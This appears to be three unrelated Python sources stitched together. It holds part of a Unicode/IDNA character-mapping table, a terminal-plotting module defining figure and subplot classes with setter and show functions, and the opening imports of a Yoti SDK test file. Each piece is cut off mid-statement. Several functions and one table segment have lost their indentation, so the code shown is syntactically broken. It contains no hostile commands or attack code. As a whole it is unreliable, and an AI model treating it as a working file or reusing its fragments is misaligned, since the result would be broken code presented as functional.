    (0x207B, 'M', u'−'),
    (0x207C, '3', u'='),
    (0x207D, '3', u'('),
    (0x207E, '3', u')'),
    (0x207F, 'M', u'n'),
    (0x2080, 'M', u'0'),
    (0x2081, 'M', u'1'),
    (0x2082, 'M', u'2'),
    (0x2083, 'M', u'3'),
    (0x2084, 'M', u'4'),
    (0x2085, 'M', u'5'),
    (0x2086, 'M', u'6'),
    (0x2087, 'M', u'7'),
    (0x2088, 'M', u'8'),
    (0x2089, 'M', u'9'),
    (0x208A, '3', u'+'),
    (0x208B, 'M', u'−'),
    (0x208C, '3', u'='),
    (0x208D, '3', u'('),
    (0x208E, '3', u')'),
    (0x208F, 'X'),
    (0x2090, 'M', u'a'),
    (0x2091, 'M', u'e'),
    (0x2092, 'M', u'o'),
    (0x2093, 'M', u'x'),
    (0x2094, 'M', u'ə'),
    (0x2095, 'M', u'h'),
    (0x2096, 'M', u'k'),
    (0x2097, 'M', u'l'),
    (0x2098, 'M', u'm'),
    (0x2099, 'M', u'n'),
    (0x209A, 'M', u'p'),
    (0x209B, 'M', u's'),
    (0x209C, 'M', u't'),
    (0x209D, 'X'),
    (0x20A0, 'V'),
    (0x20A8, 'M', u'rs'),
    (0x20A9, 'V'),
    (0x20C0, 'X'),
    (0x20D0, 'V'),
    (0x20F1, 'X'),
    (0x2100, '3', u'a/c'),
    (0x2101, '3', u'a/s'),
    (0x2102, 'M', u'c'),
    (0x2103, 'M', u'°c'),
    (0x2104, 'V'),
    (0x2105, '3', u'c/o'),
    (0x2106, '3', u'c/u'),
    (0x2107, 'M', u'ɛ'),
    (0x2108, 'V'),
    (0x2109, 'M', u'°f'),
    (0x210A, 'M', u'g'),
    (0x210B, 'M', u'h'),
    (0x210F, 'M', u'ħ'),
    (0x2110, 'M', u'i'),
    (0x2112, 'M', u'l'),
    (0x2114, 'V'),
    (0x2115, 'M', u'n'),
    (0x2116, 'M', u'no'),
    (0x2117, 'V'),
    (0x2119, 'M', u'p'),
    (0x211A, 'M', u'q'),
    (0x211B, 'M', u'r'),
    (0x211E, 'V'),
    (0x2120, 'M', u'sm'),
    (0x2121, 'M', u'tel'),
    (0x2122, 'M', u'tm'),
    (0x2123, 'V'),
    (0x2124, 'M', u'z'),
    (0x2125, 'V'),
    (0x2126, 'M', u'ω'),
    (0x2127, 'V'),
    (0x2128, 'M', u'z'),
    (0x2129, 'V'),
    ]
def _seg_22():
    """Return one segment of the Unicode mapping table: (codepoint, status[, mapping]) tuples.
    Presumably UTS #46 conventions, as in idna's uts46data -- confirm against the generator."""
    return [
    (0x212A, 'M', u'k'),
    (0x212B, 'M', u'å'),
    (0x212C, 'M', u'b'),
    (0x212D, 'M', u'c'),
    (0x212E, 'V'),
    (0x212F, 'M', u'e'),
    (0x2131, 'M', u'f'),
    (0x2132, 'X'),
    (0x2133, 'M', u'm'),
    (0x2134, 'M', u'o'),
    (0x2135, 'M', u'א'),
    (0x2136, 'M', u'ב'),
    (0x2137, 'M', u'ג'),
    (0x2138, 'M', u'ד'),
    (0x2139, 'M', u'i'),
    (0x213A, 'V'),
    (0x213B, 'M', u'fax'),
    (0x213C, 'M', u'π'),
    (0x213D, 'M', u'γ'),
    (0x213F, 'M', u'π'),
    (0x2140, 'M', u'∑'),
    (0x2141, 'V'),
    (0x2145, 'M', u'd'),
    (0x2147, 'M', u'e'),
    (0x2148, 'M', u'i'),
    (0x2149, 'M', u'j'),
    (0x214A, 'V'),
    (0x2150, 'M', u'1⁄7'),
    (0x2151, 'M', u'1⁄9'),
    (0x2152, 'M', u'1⁄10'),
    (0x2153, 'M', u'1⁄3'),
    (0x2154, 'M', u'2⁄3'),
    (0x2155, 'M', u'1⁄5'),
    (0x2156, 'M', u'2⁄5'),
    (0x2157, 'M', u'3⁄5'),
    (0x2158, 'M', u'4⁄5'),
    (0x2159, 'M', u'1⁄6'),
    (0x215A, 'M', u'5⁄6'),
    (0x215B, 'M', u'1⁄8'),
    (0x215C, 'M', u'3⁄8'),
    (0x215D, 'M', u'5⁄8'),
    (0x215E, 'M', u'7⁄8'),
    (0x215F, 'M', u'1⁄'),
    (0x2160, 'M', u'i'),
    (0x2161, 'M', u'ii'),
    (0x2162, 'M', u'iii'),
    (0x2163, 'M', u'iv'),
    (0x2164, 'M', u'v'),
    (0x2165, 'M', u'vi'),
    (0x2166, 'M', u'vii'),
    (0x2167, 'M', u'viii'),
    (0x2168, 'M', u'ix'),
    (0x2169, 'M', u'x'),
    (0x216A, 'M', u'xi'),
    (0x216B, 'M', u'xii'),
    (0x216C, 'M', u'l'),
    (0x216D, 'M', u'c'),
    (0x216E, 'M', u'd'),
    (0x216F, 'M', u'm'),
    (0x2170, 'M', u'i'),
    (0x2171, 'M', u'ii'),
    (0x2172, 'M', u'iii'),
    (0x2173, 'M', u'iv'),
    (0x2174, 'M', u'v'),
    (0x2175, 'M', u'vi'),
    (0x2176, 'M', u'vii'),
    (0x2177, 'M', u'viii'),
    (0x2178, 'M', u'ix'),
    (0x2179, 'M', u'x'),
    (0x217A, 'M', u'xi'),
    (0x217B, 'M', u'xii'),
    (0x217C, 'M', u'l'),
    (0x217D, 'M', u'c'),
    (0x217E, 'M', u'd'),
    (0x217F, 'M', u'm'),
    (0x2180, 'V'),
    (0x2183, 'X'),
    (0x2184, 'V'),
    (0x2189, 'M', u'0⁄3'),
    (0x218A, 'V'),
    (0x218C, 'X'),
    (0x2190, 'V'),
    (0x222C, 'M', u'∫∫'),
    (0x222D, 'M', u'∫∫∫'),
    (0x222E, 'V'),
    (0x222F, 'M', u'∮∮'),
    (0x2230, 'M', u'∮∮∮'),
    (0x2231, 'V'),
    (0x2260, '3'),
    (0x2261, 'V'),
    (0x226E, '3'),
    (0x2270, 'V'),
    (0x2329, 'M', u'〈'),
    (0x232A, 'M', u'〉'),
    (0x232B, 'V'),
    (0x2427, 'X'),
    (0x2440, 'V'),
    (0x244B, 'X'),
    (0x2460, 'M', u'1'),
    (0x2461, 'M', u'2'),
    ]
def _seg_23():
    """Return one segment of the Unicode mapping table: (codepoint, status[, mapping]) tuples.
    Presumably UTS #46 conventions, as in idna's uts46data -- confirm against the generator."""
    return [
    (0x2462, 'M', u'3'),
    (0x2463, 'M', u'4'),
    (0x2464, 'M', u'5'),
    (0x2465, 'M', u'6'),
    (0x2466, 'M', u'7'),
    (0x2467, 'M', u'8'),
    (0x2468, 'M', u'9'),
    (0x2469, 'M', u'10'),
    (0x246A, 'M', u'11'),
    (0x246B, 'M', u'12'),
    (0x246C, 'M', u'13'),
    (0x246D, 'M', u'14'),
    (0x246E, 'M', u'15'),
    (0x246F, 'M', u'16'),
    (0x2470, 'M', u'17'),
    (0x2471, 'M', u'18'),
    (0x2472, 'M', u'19'),
    (0x2473, 'M', u'20'),
    (0x2474, '3', u'(1)'),
    (0x2475, '3', u'(2)'),
    (0x2476, '3', u'(3)'),
    (0x2477, '3', u'(4)'),
    (0x2478, '3', u'(5)'),
    (0x2479, '3', u'(6)'),
    (0x247A, '3', u'(7)'),
    (0x247B, '3', u'(8)'),
    (0x247C, '3', u'(9)'),
    (0x247D, '3', u'(10)'),
    (0x247E, '3', u'(11)'),
    (0x247F, '3', u'(12)'),
    (0x2480, '3', u'(13)'),
    (0x2481, '3', u'(14)'),
    (0x2482, '3', u'(15)'),
    (0x2483, '3', u'(16)'),
    (0x2484, '3', u'(17)'),
    (0x2485, '3', u'(18)'),
    (0x2486, '3', u'(19)'),
    (0x2487, '3', u'(20)'),
    (0x2488, 'X'),
    (0x249C, '3', u'(a)'),
    (0x249D, '3', u'(b)'),
    (0x249E, '3', u'(c)'),
    (0x249F, '3', u'(d)'),
    (0x24A0, '3', u'(e)'),
    (0x24A1, '3', u'(f)'),
    (0x24A2, '3', u'(g)'),
    (0x24A3, '3', u'(h)'),
    (0x24A4, '3', u'(i)'),
    (0x24A5, '3', u'(j)'),
    (0x24A6, '3', u'(k)'),
    (0x24A7, '3', u'(l)'),
    (0x24A8, '3', u'(m)'),
    (0x24A9, '3', u'(n)'),
    (0x24AA, '3', u'(o)'),
    (0x24AB, '3', u'(p)'),
    (0x24AC, '3', u'(q)'),
    (0x24AD, '3', u'(r)'),
    (0x24AE, '3', u'(s)'),
    (0x24AF, '3', u'(t)'),
    (0x24B0, '3', u'(u)'),
    (0x24B1, '3', u'(v)'),
    (0x24B2, '3', u'(w)'),
    (0x24B3, '3', u'(x)'),
    (0x24B4, '3', u'(y)'),
    (0x24B5, '3', u'(z)'),
    (0x24B6, 'M', u'a'),
    (0x24B7, 'M', u'b'),
    (0x24B8, 'M', u'c'),
    (0x24B9, 'M', u'd'),
    (0x24BA, 'M', u'e'),
    (0x24BB, 'M', u'f'),
    (0x24BC, 'M', u'g'),
    (0x24BD, 'M', u'h'),
    (0x24BE, 'M', u'i'),
    (0x24BF, 'M', u'j'),
    (0x24C0, 'M', u'k'),
    (0x24C1, 'M', u'l'),
    (0x24C2, 'M', u'm'),
    (0x24C3, 'M', u'n'),
    (0x24C4, 'M', u'o'),
    (0x24C5, 'M', u'p'),
    (0x24C6, 'M', u'q'),
    (0x24C7, 'M', u'r'),
    (0x24C8, 'M', u's'),
    (0x24C9, 'M', u't'),
    (0x24CA, 'M', u'u'),
    (0x24CB, 'M', u'v'),
    (0x24CC, 'M', u'w'),
    (0x24CD, 'M', u'x'),
    (0x24CE, 'M', u'y'),
    (0x24CF, 'M', u'z'),
    (0x24D0, 'M', u'a'),
    (0x24D1, 'M', u'b'),
    (0x24D2, 'M', u'c'),
    (0x24D3, 'M', u'd'),
    (0x24D4, 'M', u'e'),
    (0x24D5, 'M', u'f'),
    (0x24D6, 'M', u'g'),
    (0x24D7, 'M', u'h'),
    (0x24D8, 'M', u'i'),
    ]
def _seg_24():
return [
(0x24D9, 'M', u'j'),
(0x24DA, 'M', u'k'),
(0x24DB, 'M', u'l'),
(0x24DC, 'M', u'm'),
(0x24DD, 'M', u'n'),
(0x24DE, 'M', u'o'),
(0x24DF, 'M', u'p'),
(0x24E0, 'M', u'q'),
(0x24E1, 'M', u'r'),
(0x24E2, 'M', u's'),
(0x24E3, 'M', u't'),
(0x24E4, 'M', u'u'),
(0x24E5, 'M', u'v'),
(0x24E6, 'M', u'w'),
(0x24E7, 'M', u'x'),
(0x24E8, 'M', u'y'),
(0x24E9, 'M', u'z'),
(0x24EA, 'M', u'0'),
(0x24EB, 'V'),
(0x2A0C, 'M', u'∫∫∫∫'),
(0x2A0D, 'V'),
(0x2A74, '3', u'::='),
(0x2A75, '3', u'=='),
(0x2A76, '3', u'==='),
(0x2A77, 'V'),
(0x2ADC, 'M', u'⫝̸'),
(0x2ADD, 'V'),
(0x2B74, 'X'),
(0x2B76, 'V'),
(0x2B96, 'X'),
(0x2B98, 'V'),
(0x2BC9, 'X'),
(0x2BCA, 'V'),
(0x2BFF, 'X'),
(0x2C00, 'M', u'ⰰ'),
(0x2C01, 'M', u'ⰱ'),
(0x2C02, 'M', u'ⰲ'),
(0x2C03, 'M', u'ⰳ'),
(0x2C04, 'M', u'ⰴ'),
(0x2C05, 'M', u'ⰵ'),
(0x2C06, 'M', u'ⰶ'),
(0x2C07, 'M', u'ⰷ'),
(0x2C08, 'M', u'ⰸ'),
(0x2C09, 'M', u'ⰹ'),
(0x2C0A, 'M', u'ⰺ'),
(0x2C0B, 'M', u'ⰻ'),
(0x2C0C, 'M', u'ⰼ'),
(0x2C0D, 'M', u'ⰽ'),
(0x2C0E, 'M', u'ⰾ'),
(0x2C0F, 'M', u'ⰿ'),
(0x2C10, 'M', u'ⱀ'),
(0x2C11, 'M', u'ⱁ'),
(0x2C12, 'M', u'ⱂ'),
(0x2C13, 'M', u'ⱃ'),
(0x2C14, 'M', u'ⱄ'),
(0x2C15, 'M', u'ⱅ'),
(0x2C16, 'M', u'ⱆ'),
(0x2C17, 'M', u'ⱇ'),
(0x2C18, 'M', u'ⱈ'),
(0x2C19, 'M', u'ⱉ'),
(0x2C1A, 'M', u'ⱊ'),
(0x2C1B, 'M', u'ⱋ'),
(0x2C1C, 'M', u'ⱌ'),
(0x2C1D, 'M', u'ⱍ'),
(0x2C1E, 'M', u'ⱎ'),
(0x2C1F, 'M', u'ⱏ'),
(0x2C20, 'M', u'ⱐ'),
(0x2C21, 'M', u'ⱑ'),
(0x2C22, 'M', u'ⱒ'),
(0x2C23, 'M', u'ⱓ'),
(0x2C24, 'M', u'ⱔ'),
(0x2C25, 'M', u'ⱕ'),
(0x2C26, 'M', u'ⱖ'),
(0x2C27, 'M', u'ⱗ'),
(0x2C28, 'M', u'ⱘ'),
(0x2C29, 'M', u'ⱙ'),
(0x2C2A, 'M', | |
# /usr/bin/env python3
# -*- coding: utf-8 -*-
##############################################
############## Importing ###############
##############################################
import utility as _utility
import docstrings as _docstrings
import subprocess as _subprocess
##############################################
########### Initialization #############
##############################################
# Detect the host platform once at import time.  On Windows an empty shell
# call is issued (presumably to enable ANSI escape processing -- confirm) and
# the 'small' marker is removed from the available marker set.
_platform = _utility.platform()
#_platform = "windows"
if _platform == "windows":
    _subprocess.call('', shell = True)
    _utility.marker.pop('small')
    _utility.marker_sequence.remove('small')
_shell = _utility.shell()
##############################################
########## Basic Containers ############
##############################################
class _figure():
    """Top-level figure state: a grid of subplots plus the currently active one."""
    def __init__(self):
        self.width = None    # figure size (None = decided elsewhere)
        self.height = None
        self.rows = 1        # subplot grid shape
        self.cols = 1
        self.set_subplots()
        self.row = 0         # 0-based coordinates of the active subplot
        self.col = 0
        self.set_subplot()
        self.canvas = ""     # rendered text canvas (filled elsewhere)
    def set_subplots(self):
        # Rebuild the rows x cols matrix of fresh subplots.
        self.subplots = [[_subplot(r, c) for c in range(self.cols)] for r in range(self.rows)]
    def get_subplot(self, row = 0 , col = 0):
        # NOTE(review): takes 1-based coordinates (row-1/col-1), while
        # set_subplot indexes with the stored 0-based row/col -- confirm callers.
        return self.subplots[row - 1][col - 1]
    def set_subplot(self):
        # Cache the active subplot object for quick access.
        self.subplot = self.subplots[self.row][self.col]
class _subplot():
    """Per-subplot state: data series, per-series styling and axis configuration."""
    def __init__(self, row, col):
        # Position of this subplot inside the figure grid (0-based).
        self.row = row
        self.col = col
        # Per-series style lists; index i describes the i-th plotted series.
        self.yaxis = []
        self.label = []
        self.label_show = []
        self.point_marker = []
        self.line_marker = []
        self.point_color = []
        self.line_color = []
        # Per-series data and the count of series plotted so far.
        self.x = []
        self.y = []
        self.signals = 0
        self.fillx = []
        self.filly = []
        # Sizes: *_set hold the user's request, width/height the resolved values.
        self.width = None
        self.height = None
        self.width_set = None
        self.height_set = None
        # Text decorations; ylabel holds [left, right] axis labels.
        self.title = ""
        self.xlabel = ""
        self.ylabel = ["", ""]
        # Axis visibility and grid flags as [first, second] boolean pairs.
        self.xaxes = [True, True]
        self.yaxes = [True, True]
        self.grid = [False, False]
        self.axes_color = "white"
        self.ticks_color = "black"
        self.canvas_color = "white"
        # Plot ranges; None means derived automatically.
        self.xlim_plot = [None, None]
        self.ylim_plot_left = [None, None]
        self.ylim_plot_right = [None, None]
        # Explicit tick positions/labels (empty = computed automatically).
        self.xticks, self.xlabels = [], []
        self.yticks_left, self.ylabels_left = [], []
        self.yticks_right, self.ylabels_right = [], []
        self.ticks = [5, 7]
        self.xscale = "linear"
        self.yscale = ["linear", "linear"]
# Module-level singleton figure that all public functions operate on.
_fig = _figure()
#figure = _fig
#utility = _utility
##############################################
######### Subplots Function ############
##############################################
def subplots(rows = None, cols = None, ):
    """Configure the figure's subplot grid and make subplot (1, 1) active."""
    rows, cols = _utility.set_first_to_both(rows, cols)
    _set_cols(cols)
    _set_rows(rows)
    _fig.set_subplots()
    subplot(1, 1)
subplots.__doc__ = _docstrings.subplots_doc
def _set_cols(cols = None):
    # Default to a single column when unspecified.
    _fig.cols = _utility.set_if_none(cols, 1)
def _set_rows(rows = None):
    # Default to a single row when unspecified.
    _fig.rows = _utility.set_if_none(rows, 1)
def subplot(row = 1, col = 1):
    """Make the subplot at (row, col) -- 1-based -- the active one."""
    _set_col(col)
    _set_row(row)
    _fig.set_subplot()
subplot.__doc__ = _docstrings.subplot_doc
def _set_col(col = None):
    # Public API is 1-based; store 0-based.
    _fig.col = _utility.set_if_none(col, 1) - 1
def _set_row(row = None):
    # Public API is 1-based; store 0-based.
    _fig.row = _utility.set_if_none(row, 1) - 1
# Initialize the module with a single, active 1x1 subplot grid.
subplots(1, 1)
subplot(1, 1)
##############################################
####### Draw Related Functions #########
##############################################
def _draw(*args, **kwargs):
    """Register one data series together with all its per-series options.
    Each helper appends exactly one entry to its parallel list, keeping every
    style list aligned with the series index."""
    _yaxis(kwargs.get("yaxis"))
    _label(kwargs.get("label"))
    _point_marker(kwargs.get("point_marker"))
    _line_marker(kwargs.get("line_marker"))
    _point_color(kwargs.get("point_color"))
    _line_color(kwargs.get("line_color"))
    _data(*args)
    _fillx(kwargs.get("fillx"))
    _filly(kwargs.get("filly"))
def _yaxis(axis = None):
    """Record which y axis ("left"/"right") the newest series belongs to."""
    axis = _utility.set_if_none(axis, "left")
    if axis not in ("left", "right"):
        axis = "left"
    _fig.subplot.yaxis.append(axis)
def _label(label = None):
    """Record the label (and its visibility flag) for the newest data series."""
    text = _utility.set_if_none(label, "")
    _fig.subplot.label.append(text)
    _fig.subplot.label_show.append(True)
#To-do: data with same label
def _point_marker(marker = None):
    """Choose/normalize the point marker for the newest series and store it.

    Fix: removed `marker = "" if marker == "" else marker`, a no-op statement.
    """
    # Cycle through the default sequence based on how many distinct markers
    # are already in use on this subplot.
    index = len(set(_fig.subplot.point_marker)) % len(_utility.marker_sequence)
    marker_none = _utility.marker_sequence[index]
    marker = _utility.set_if_none(marker, marker_none)
    # On Linux the special "small" marker keeps its symbolic name.
    small_test = marker == "small" and _platform == "linux"
    marker = _utility.marker[marker] if marker in _utility.marker and not small_test else marker
    # Non-named markers are truncated to their first character.
    marker = "small" if small_test else (marker[0] if len(marker) > 0 else marker)
    _fig.subplot.point_marker.append(marker)
def _line_marker(marker = None):
    """Choose/normalize the line marker for the newest series and store it.

    Fix: removed `marker = "" if marker == "" else marker`, a no-op statement.
    """
    # Cycle through the default sequence based on how many distinct markers
    # are already in use on this subplot.
    index = len(set(_fig.subplot.line_marker)) % len(_utility.marker_sequence)
    marker_none = _utility.marker_sequence[index]
    marker = _utility.set_if_none(marker, marker_none)
    # On Linux the special "small" marker keeps its symbolic name.
    small_test = marker == "small" and _platform == "linux"
    marker = _utility.marker[marker] if marker in _utility.marker and not small_test else marker
    # Non-named markers are truncated to their first character.
    marker = "small" if small_test else (marker[0] if len(marker) > 0 else marker)
    _fig.subplot.line_marker.append(marker)
def _point_color(color = None):
    """Validate or auto-pick the point colour for the newest series."""
    if color not in _utility.color_sequence:
        color = None
    cycle_index = len(set(_fig.subplot.point_color)) % len(_utility.color_sequence)
    fallback = _utility.color_sequence[cycle_index]
    _fig.subplot.point_color.append(_utility.set_if_none(color, fallback))
def _line_color(color = None):
    """Validate or auto-pick the line colour for the newest series."""
    if color not in _utility.color_sequence:
        color = None
    cycle_index = len(set(_fig.subplot.line_color)) % len(_utility.color_sequence)
    fallback = _utility.color_sequence[cycle_index]
    _fig.subplot.line_color.append(_utility.set_if_none(color, fallback))
def _data(*args):
    """Append one (x, y) data series and bump the series counter."""
    xs, ys = _utility.get_data(*args)
    _fig.subplot.x.append(xs)
    _fig.subplot.y.append(ys)
    _fig.subplot.signals += 1
def _fillx(fill = None):
    # Record whether the newest series should be filled toward the x axis.
    _fig.subplot.fillx.append(bool(_utility.set_if_none(fill, False)))
def _filly(fill = None):
    # Record whether the newest series should be filled toward the y axis.
    _fig.subplot.filly.append(bool(_utility.set_if_none(fill, False)))
##############################################
########### Clear Functions ############
##############################################
def clear_terminal():
    """Clear the whole terminal (ANSI full reset) and zero the printed-lines counter."""
    _utility.write('\033c')
    _utility._terminal_printed_lines_cnt = 0
clear_terminal.__doc__ = _docstrings.clear_terminal_doc
clt = clear_terminal
def clear_terminal_printed_lines():
    """Erase only the lines plotext previously printed, leaving the rest intact."""
    # +1 because the last printed line does not end with a newline.
    n = _utility._terminal_printed_lines_cnt + 1
    for i in range(n):
        _utility.write("\033[2K")       # erase the current line
        if i < n - 1:
            _utility.write("\033[A")    # move the cursor up one line
    # NOTE(review): this re-erases the line the cursor already sits on --
    # looks redundant with the final loop iteration; confirm intended.
    _utility.write("\033[2K")
    _utility._terminal_printed_lines_cnt = 0
def clear_figure():
    """Reset the whole figure to its initial (1x1, empty) state by re-running __init__."""
    _fig.__init__()
clear_figure.__doc__ = _docstrings.clear_figure_doc
clf = clear_figure
def clear_plot():
    """Reset only the active subplot (same grid position) to a fresh state."""
    _fig.subplot.__init__(_fig.row, _fig.col)
clear_plot.__doc__ = _docstrings.clear_plot_doc
clp = clear_plot
def clear_data():
    """Drop the plotted data of the active subplot, keeping its configuration.
    NOTE(review): the parallel style lists (label, markers, colors, fillx/filly)
    are not cleared here, so they can grow out of sync with signals -- confirm."""
    _fig.subplot.x = []
    _fig.subplot.y = []
    _fig.subplot.signals = 0
clear_data.__doc__ = _docstrings.clear_data_doc
cld = clear_data
##############################################
############ Set Functions #############
##############################################
def plotsize(width = None, height = None):
    """Request an explicit plot size for the active subplot."""
    width, height = _utility.set_first_to_both(width, height)
    width, height = _utility.set_list_to_both(width, height)
    _fig.subplot.width_set, _fig.subplot.height_set = width, height
plotsize.__doc__ = _docstrings.plotsize_doc
plot_size = plotsize
def title(label = None):
    """Set the active subplot's title; None keeps the current title."""
    label = _utility.set_if_none(label, _fig.subplot.title)
    # An explicit empty string is stored as None (no title).
    label = None if label == "" else label
    _fig.subplot.title = label
title.__doc__ = _docstrings.title_doc
def xlabel(label = ""):
label = _utility.set_if_none(label, _fig.subplot.xlabel)
_fig.subplot.xlabel = label
xlabel.__doc__ = _docstrings.xlabel_doc
def ylabel(label_left = "", label_right = ""):
label_left = _utility.set_if_none(label_left, _fig.subplot.ylabel[0])
label_right = _utility.set_if_none(label_right, _fig.subplot.ylabel[1])
_fig.subplot.ylabel = [label_left, label_right]
ylabel.__doc__ = _docstrings.ylabel_doc
def xaxes(x = None, y = None):
    """Enable/disable the two x axes; None keeps the stored setting.

    Fix: the original ran bool(y) before applying the stored defaults, turning
    a None ("keep current") into False and discarding the default for y.
    """
    x, y = _utility.set_first_to_both(x, y)
    x, y = _utility.set_list_if_none([x, y], _fig.subplot.xaxes)
    x, y = _utility.set_list_to_both(x, y)
    _fig.subplot.xaxes = [bool(x), bool(y)]
xaxes.__doc__ = _docstrings.xaxes_doc
def yaxes(x = None, y = None):
    """Enable/disable the two y axes; None keeps the stored setting.

    Fix: the original ran bool(y) before applying the stored defaults, turning
    a None ("keep current") into False and discarding the default for y.
    """
    x, y = _utility.set_first_to_both(x, y)
    x, y = _utility.set_list_if_none([x, y], _fig.subplot.yaxes)
    x, y = _utility.set_list_to_both(x, y)
    _fig.subplot.yaxes = [bool(x), bool(y)]
yaxes.__doc__ = _docstrings.yaxes_doc
def grid(x = None, y = None):
    """Enable/disable the horizontal/vertical grid lines; None keeps the stored setting.

    Fix: the original ran bool(y) before applying the stored defaults, turning
    a None ("keep current") into False and discarding the default for y.
    """
    x, y = _utility.set_first_to_both(x, y)
    x, y = _utility.set_list_if_none([x, y], _fig.subplot.grid)
    x, y = _utility.set_list_to_both(x, y)
    _fig.subplot.grid = [bool(x), bool(y)]
grid.__doc__ = _docstrings.grid_doc
def axes_color(color = "white"):
color = _utility.set_if_none(color, _fig.subplot.axes_color)
color = "white" if color not in list(_utility.background_color.keys()) else color
_fig.subplot.axes_color = color
axes_color.__doc__ = _docstrings.axes_color_doc
def ticks_color(color = "black"):
color = _utility.set_if_none(color, _fig.subplot.ticks_color)
color = "black" if color not in list(_utility.fullground_color.keys()) else color
_fig.subplot.ticks_color = color
ticks_color.__doc__ = _docstrings.ticks_color_doc
def canvas_color(color = "white"):
color = _utility.set_if_none(color, _fig.subplot.canvas_color)
color = "white" if color not in list(_utility.background_color.keys()) else color
_fig.subplot.canvas_color = color
canvas_color.__doc__ = _docstrings.canvas_color_doc
def _colorless_subplot(subplot):
    """Strip every colour setting from `subplot` (all become "none")."""
    n_points = len(subplot.point_color)
    n_lines = len(subplot.line_color)
    subplot.point_color = ["none"] * n_points
    subplot.line_color = ["none"] * n_lines
    subplot.axes_color = subplot.ticks_color = subplot.canvas_color = "none"
def colorless():
    """Remove all colours from the active subplot."""
    _colorless_subplot(_fig.subplot)
colorless.__doc__ = _docstrings.colorless_doc
cls = colorless
def xlim(left = None, right = None):
    # Set the x-axis plotting limits, storing the pair ordered low-to-high.
    left, right = _utility.set_list_to_both(left, right)
    _fig.subplot.xlim_plot = [min(left, right), max(left, right)]
xlim.__doc__ = _docstrings.xlim_doc
def ylim(lower = None, upper = None, yaxis = "left"):
    # Set y-axis plotting limits for the chosen side ("left" or "right"),
    # storing the pair ordered low-to-high.
    lower, upper = _utility.set_list_to_both(lower, upper)
    bounds = [min(lower, upper), max(lower, upper)]
    if yaxis == "left":
        _fig.subplot.ylim_plot_left = bounds
    elif yaxis == "right":
        _fig.subplot.ylim_plot_right = bounds
ylim.__doc__ = _docstrings.ylim_doc
def ticks(x = None, y = None):
    # Number of ticks on each axis; defaults are 5 for x and 7 for y.
    x, y = _utility.set_first_to_both(x, y)
    x, y = _utility.set_list_to_both(x, y)
    _fig.subplot.ticks = [
        _utility.set_if_none(x, 5),
        _utility.set_if_none(y, 7),
    ]
ticks.__doc__ = _docstrings.ticks_doc
def xticks(ticks = None, labels = None):
    # Explicit x-axis tick positions and (optional) labels; labels default to
    # the string form of the positions.
    # Fix: `ticks` previously defaulted to a mutable [] (Python anti-pattern);
    # None is now the sentinel, with identical behavior for all callers.
    ticks = [] if ticks is None else ticks
    ticks, labels = _utility.set_first_to_both(list(ticks), labels)
    labels = list(map(str, list(labels)))
    ticks, labels = _utility.sort_data(ticks, labels)
    _fig.subplot.xticks, _fig.subplot.xlabels = ticks, labels
    _fig.subplot.ticks[0] = len(ticks)
xticks.__doc__ = _docstrings.xticks_doc
def yticks(ticks = None, labels = None, yaxis = "left"):
    # Explicit y-axis tick positions and (optional) labels for the chosen side.
    # Fix: `ticks` previously defaulted to a mutable [] (Python anti-pattern);
    # None is now the sentinel, with identical behavior for all callers.
    ticks = [] if ticks is None else ticks
    ticks, labels = _utility.set_first_to_both(list(ticks), labels)
    labels = list(map(str, list(labels)))
    ticks, labels = _utility.sort_data(ticks, labels)
    if yaxis == "left":
        _fig.subplot.yticks_left, _fig.subplot.ylabels_left = ticks, labels
    elif yaxis == "right":
        _fig.subplot.yticks_right, _fig.subplot.ylabels_right = ticks, labels
    # NOTE: tick count is updated even for an unrecognized yaxis, matching
    # the previous behavior.
    _fig.subplot.ticks[1] = len(ticks)
yticks.__doc__ = _docstrings.yticks_doc
def xscale(scale = None):
    # x-axis scale, "linear" or "log"; anything else resets to linear.
    chosen = _utility.set_if_none(scale, _fig.subplot.xscale)
    if chosen not in ["linear", "log"]:
        chosen = "linear"
    _fig.subplot.xscale = chosen
xscale.__doc__ = _docstrings.xscale_doc
def yscale(scale = None, yaxis = "left"):
    # y-axis scale for the chosen side, "linear" or "log".
    side = 1 if yaxis == "right" else 0
    # Bug fix: the None-default previously read _fig.subplot.xscale (a
    # copy-paste from xscale); it now keeps the current scale of the
    # targeted y axis instead.
    scale = _utility.set_if_none(scale, _fig.subplot.yscale[side])
    if scale not in ["linear", "log"]:
        scale = "linear"
    _fig.subplot.yscale[side] = scale
yscale.__doc__ = _docstrings.yscale_doc
##############################################
########### Show Functions #############
##############################################
def show(hide = False):
    """Build every subplot's canvas and write the assembled figure.

    When `hide` is True the figure is fully built (so `_fig.canvas` is
    populated) but nothing is written out.
    """
    # figure-level sizing must happen before any subplot is rendered
    _figure_size_max()
    _figure_size()
    #_plots_size()
    _coherent_sizes()
    for r in range(_fig.rows):
        for c in range(_fig.cols):
            subplot = _fig.subplots[r][c]
            # NOTE: call order below matters — limits feed ticks, ticks feed
            # the character matrix, and decorations are layered on last.
            _previous_size(subplot)
            _sort_data(subplot)
            # vertical pass: height, then y limits, then y ticks
            _height(subplot)
            _ylim_data(subplot)
            _ylim_plot(subplot)
            _yticks(subplot)
            # horizontal pass: width, then x limits, then x ticks
            _width(subplot)
            _xlim_data(subplot)
            _xlim_plot(subplot)
            _xticks(subplot)
            # rasterize, then layer grid, data, legend, axes and labels on top
            _matrix(subplot)
            _add_xgrid(subplot)
            _add_ygrid(subplot)
            _add_data(subplot)
            _add_legend(subplot)
            _add_yaxis(subplot)
            _add_xaxis(subplot)
            _add_title(subplot)
            _add_labels(subplot)
    _join_matrices()
    _fig.canvas = _utility.get_canvas(_fig.matrix)
    if hide:
        return
    _utility.write(_fig.canvas)
show.__doc__ = _docstrings.show_doc
def _figure_size_max():
    # Maximum drawable figure size: the terminal, minus 3 rows of margin and
    # one separator row/column between adjacent subplots.
    cols, rows = terminal_size()
    _fig.width_max = cols - (_fig.cols - 1)
    _fig.height_max = rows - 3 - (_fig.rows - 1)
def _figure_size():
# width = _utility.set_if_none(_fig.width, _fig.width_max)
# height = _utility.set_if_none(_fig.height, _fig.height_max)
# width = abs(int(width))
# height = abs(int(height))
# width = _fig.width_max if | |
# -*- coding: utf-8 -*-
import collections
import json
import logging
import pytest
from yoti_python_sdk import config
from yoti_python_sdk.attribute import Attribute
from yoti_python_sdk.profile import Profile, ApplicationProfile
from yoti_python_sdk.age_verification import AgeVerification
from yoti_python_sdk.protobuf.protobuf import Protobuf
from yoti_python_sdk.tests import attribute_fixture_parser, image_helper
from yoti_python_sdk.tests.protobuf_attribute import ProtobufAttribute
from yoti_python_sdk.image import Image
# --- structured postal address fixture keys and values ----------------------
